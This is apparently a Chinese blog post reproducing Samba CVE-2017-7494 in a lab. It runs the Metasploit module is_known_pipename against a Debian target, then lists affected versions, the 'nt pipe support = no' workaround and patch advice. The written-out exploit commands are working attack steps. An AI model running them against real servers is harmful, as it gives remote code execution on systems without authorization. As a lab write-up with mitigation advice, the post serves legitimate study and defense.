Samba CVE-2017-7494验证实验

漏洞简介

Samba是在Linux和UNIX系统上实现SMB协议的一个软件,不少IoT设备也使用了Samba。2017年5月24日Samba发布了4.6.4版本,修复了一个严重的远程代码执行漏洞,漏洞编号CVE-2017-7494,攻击者可以利用该漏洞在目标服务器上执行任意代码。2017年5月25日hdm给metasploit提交了该漏洞的exp。2017年5月25日openwrt发布了针对该漏洞的修复补丁,许多IoT设备同样受该漏洞影响。

测试环境
攻击机:kali                                    IP:192.168.0.10
靶   机:debian                              IP:192.168.0.20
服务:samba: 4.5

漏洞验证

启动Kali执行命令:

msfconsole

msf > use exploit/linux/samba/is_known_pipename

set RHOST 192.168.0.20

run

进入目标系统并查看文件:

cd /  ls
验证完成


影响版本:
Samba:3.5     <4.6.4     <4.5.10     <4.4.14。
4.6.4/4.5.10/4.4.14已修复此漏洞。

修复建议:
1、临时方案
在smb.conf的[global]节点下增加 nt pipe support = no选项,重新启动samba服务。

2、官方修复
Samba已发布新版本,可通过更新版本解决。

补丁下载
https://www.samba.org/

 

此实验仅供学习参考,不得用于其他任何目的,其他违法行为本人不负任何责任,在此申明!

posted @ 2019-10-17 11:26  .Ding  阅读(666)  评论(0编辑  收藏  举报